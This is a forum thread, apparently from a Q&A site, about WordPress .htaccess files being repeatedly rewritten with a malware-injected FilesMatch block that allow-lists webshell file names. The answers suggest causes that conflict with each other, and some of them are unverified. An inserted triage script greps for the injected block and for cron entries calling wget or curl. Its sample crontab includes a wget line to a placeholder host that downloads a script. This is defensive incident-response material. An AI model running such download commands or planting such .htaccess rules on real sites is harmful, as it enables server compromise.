Kalpana

Reputation: 1

.htaccess file is getting updated with deny code very frequently and resulting in broken dashboard

I am facing an issue with my WordPress websites. The .htaccess file is frequently being updated with the following deny code:

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|template-load.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

But the default .htaccess code is:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

Even if I change it back to the default code, after some time it is again updated with the deny code. And this .htaccess file is getting updated in all the folders.

This is happening with all websites hosted on the same multi-domain hosting plan. This deny code is resulting in a broken dashboard, and other issues, such as modifications being prevented, are arising.

Upvotes: 0

Views: 3446

Answers (4)

Ashish

Reputation: 83

The code added to the main index page or about php of WordPress was telling PHP-FPM to rebuild the file from its cache if it was changed.

  1. To remove or edit the file, you first need to disable PHP-FPM.
  2. Change or remove the index.php file.
  3. Then you can restart PHP-FPM and start doing normal work on the site. Hope this helps someone.

Upvotes: 0

swar3z

Reputation: 21

I think you have a cron job that has been downloading the webshells; I have observed this behaviour since the beginning of August.

Are you using cPanel to host your website? If so, go check your cron jobs for a task that has a wget request to the domain hello.turnedpro.xyz. There is a bash script that is downloaded and executed to download the webshell from the domain, and that's why it keeps on coming back after you delete it.

Let me know how it goes.

Upvotes: 1
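
A read-only triage sketch for the two checks raised so far (the injected `.htaccess` block from the question and the cron entry from the answer above), added here as an example and not code from any poster. The function names, the sample tree and the placeholder cron URL are constructed; the dropper file names and the domain are the ones quoted on this page.

```shell
#!/usr/bin/env bash
# Read-only triage helpers (added example; function names are hypothetical).

# List .htaccess files under $1 carrying the injected allow-list block,
# recognised by dropper file names quoted in the question.
find_injected_htaccess() {
    find "$1" -type f -name '.htaccess' -exec grep -lE \
        '<FilesMatch[^>]*(lock666|wjsindex|jsdindex|postfs)\.php' {} + | sort
}

# Read crontab text on stdin; print active (non-comment) entries that call
# wget/curl or mention the domain named in the answer above.
suspicious_cron_lines() {
    grep -vE '^[[:space:]]*(#|$)' |
        grep -E '(^|[^[:alnum:]_])(wget|curl)([[:space:]]|$)|hello\.turnedpro\.xyz'
}

# Write a constructed sample tree and crontab into directory $1.
make_sample() {
    mkdir -p "$1/site/wp-admin" "$1/site/wp-content"
    cat > "$1/site/.htaccess" <<'EOF'
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(index.php|lock666.php|wp-login.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
EOF
    cp "$1/site/.htaccess" "$1/site/wp-admin/.htaccess"
    # Clean file for contrast: rewrite rules only, no FilesMatch block.
    cat > "$1/site/wp-content/.htaccess" <<'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule . index.php [L]
</IfModule>
EOF
    cat > "$1/crontab.txt" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/bin/php /home/user/public_html/wp-cron.php
*/10 * * * * wget -q -O /tmp/placeholder.sh http://placeholder.invalid/placeholder.sh
EOF
}

# Live use (paths are assumptions about the hosting layout):
#   find_injected_htaccess "$HOME/public_html"
#   crontab -l | suspicious_cron_lines
```

Hits are candidates for review rather than verdicts: legitimate WordPress cron entries sometimes call wget or curl against wp-cron.php.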

Karan Sharma

Reputation: 125

That appears to be the malware adding an .htaccess entry with the following code under the root and wp-admin folders. Further, it's also updating the index.php file. So, I checked the processes using htop. You will find a process that keeps on running, locating php to your website directory; in my case, it was pointing to the lock666.php file in root. It turned out the file was missing. But somehow the code was in server memory and being executed every time I updated the .htaccess file above.

Hope this helps.

Upvotes: 0

Usman

Reputation: 61

That is the PHP Execution Security Policy. Check the settings in your security plugin.

Upvotes: 1
